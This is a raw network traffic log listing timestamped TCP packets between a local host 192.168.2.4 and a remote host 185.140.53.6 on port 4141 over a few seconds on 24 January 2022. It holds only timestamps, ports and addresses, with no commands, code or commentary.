Jan 24, 2022 02:25:53.576314926 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.576333046 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.576353073 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.576360941 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.576391935 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.576400995 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.576436996 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.576565981 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.576602936 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.576617002 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.576646090 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.576736927 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.576838017 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.576920986 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.576977968 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.579935074 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.579973936 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.580009937 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.580039978 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.580087900 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.580141068 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.580180883 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.580234051 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.580326080 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.580375910 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.580441952 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.580495119 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.580641031 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.580691099 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.580785036 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.580837011 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.580909014 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.580950975 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.580957890 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.580993891 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.584494114 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.584523916 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.584563017 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.584588051 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.584636927 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.584691048 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.584815979 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.584870100 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.584935904 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.584999084 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.585066080 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.585119963 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.585184097 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.585237980 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.585303068 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.585352898 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.585416079 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.585469961 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.585505009 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.585557938 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.585624933 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.585676908 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.586452007 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.586508036 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.673717022 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.673868895 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.675062895 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.675189972 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.675196886 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.675249100 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.675517082 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.675590038 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.675627947 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.675679922 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.679368019 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.679408073 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.679442883 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.679445982 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.679464102 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.679500103 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.679578066 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.679634094 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.681197882 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.681271076 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.681302071 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.681365013 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.681370974 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.681421041 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.681611061 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.681648970 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.681674957 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.681699038 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.681866884 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.681921005 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.681972027 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.682028055 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.682092905 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.682152033 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.682161093 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.682213068 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.682280064 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.682332039 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.682499886 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.682559013 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.682562113 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.682612896 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.683089018 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.683154106 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.689722061 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.689872026 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.691639900 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.691679955 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.691714048 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.691729069 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.691781998 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.691837072 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.691880941 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.691936970 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.692019939 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.692078114 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.693324089 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.693394899 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.723079920 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.723135948 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.723176003 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.723215103 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.723233938 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.723253965 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.723280907 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.723289013 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.723294020 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.723309994 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.723561049 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.723603010 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.723629951 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.723658085 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.723706007 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.723762035 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.723774910 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.723834991 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.723891020 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.723952055 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.724050045 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.724111080 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.724164009 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.724244118 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.724313974 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.724375963 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.724376917 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.724435091 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.724586964 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.724659920 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.724670887 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.724739075 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.724811077 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.724905014 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.724946976 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.724968910 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.725071907 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.725208998 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.725311041 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.725363970 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.725435972 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.725474119 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.725493908 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.725522995 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.769505024 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.793279886 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.793338060 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.793364048 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.793379068 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.793395042 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.793417931 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.793436050 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.793457985 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.793472052 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.793495893 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.793510914 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.793584108 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.793596983 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.793657064 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.793693066 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.793754101 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.793965101 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.794006109 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.794044018 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.794061899 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.804379940 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.804435015 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.804482937 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.804517031 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.804558992 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.804627895 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.804760933 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.804825068 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.809436083 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.809520960 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.809693098 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.809758902 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.821954966 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.822022915 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.835716963 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.835750103 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.835787058 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.835824013 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.836019039 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.836044073 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.836081982 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.836098909 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.836102009 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.836157084 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.836258888 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.836309910 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.836373091 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.836424112 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.836452007 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.836503029 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.836579084 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.836630106 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.836734056 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.836785078 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.836898088 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.836951017 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.836961985 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.837033987 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.837136984 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.837192059 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.837239981 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.837291956 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.837378979 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.837429047 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.837486982 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.837538958 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.837599039 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.837650061 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.837708950 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.837759018 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.856815100 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.856883049 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.863446951 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.863502979 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.863528967 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.863540888 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.863545895 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.863589048 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.863810062 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.863851070 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.863867998 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.863899946 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.863915920 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.863964081 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.864037991 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.864092112 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.886353016 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.886406898 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.886425972 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.886456013 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.886504889 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.886560917 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.886595011 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.886658907 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.886662960 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.886708975 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.886725903 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.886764050 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.886816025 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.886873960 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.887048006 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.887106895 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.887151957 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.887196064 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.887213945 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.887244940 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.887248993 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.887298107 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.887377024 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.887434006 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:53.887659073 CET	4141	49792	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:53.887722969 CET	49792	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:57.999811888 CET	49810	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:58.088191032 CET	4141	49810	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:58.088340998 CET	49810	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:58.115693092 CET	49810	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:58.424098969 CET	4141	49810	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:58.424175024 CET	49810	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:58.442863941 CET	4141	49810	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:58.487746000 CET	49810	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:58.721656084 CET	4141	49810	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:58.721947908 CET	49810	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:58.811614990 CET	4141	49810	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:58.811769009 CET	49810	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:59.222198963 CET	49810	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:59.288227081 CET	4141	49810	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:59.288428068 CET	49810	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:59.404694080 CET	4141	49810	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:59.416980028 CET	4141	49810	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:59.417079926 CET	4141	49810	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:59.417172909 CET	49810	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:59.441468954 CET	49810	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:59.515830040 CET	4141	49810	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:59.515903950 CET	49810	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:59.516005039 CET	4141	49810	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:59.516208887 CET	4141	49810	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:59.516266108 CET	49810	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:59.516313076 CET	4141	49810	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:59.517193079 CET	49810	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:59.641730070 CET	4141	49810	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:59.641786098 CET	4141	49810	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:59.641860962 CET	49810	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:59.651268005 CET	4141	49810	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:59.651421070 CET	49810	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:59.651505947 CET	4141	49810	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:59.651602030 CET	49810	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:59.747158051 CET	4141	49810	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:59.747251034 CET	4141	49810	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:59.747327089 CET	49810	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:59.747533083 CET	4141	49810	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:59.747575998 CET	4141	49810	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:59.747637033 CET	49810	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:59.747976065 CET	4141	49810	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:59.748014927 CET	4141	49810	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:59.748071909 CET	4141	49810	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:59.748081923 CET	49810	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:59.748110056 CET	4141	49810	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:59.748161077 CET	49810	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:59.748346090 CET	4141	49810	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:59.748498917 CET	4141	49810	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:59.748660088 CET	4141	49810	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:59.748723030 CET	49810	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:59.748754025 CET	4141	49810	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:59.750427008 CET	49810	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:59.806168079 CET	49810	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:59.948587894 CET	4141	49810	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:59.948647976 CET	4141	49810	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:59.948688030 CET	4141	49810	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:59.948729038 CET	4141	49810	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:59.948743105 CET	49810	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:59.948765039 CET	4141	49810	185.140.53.6	192.168.2.4
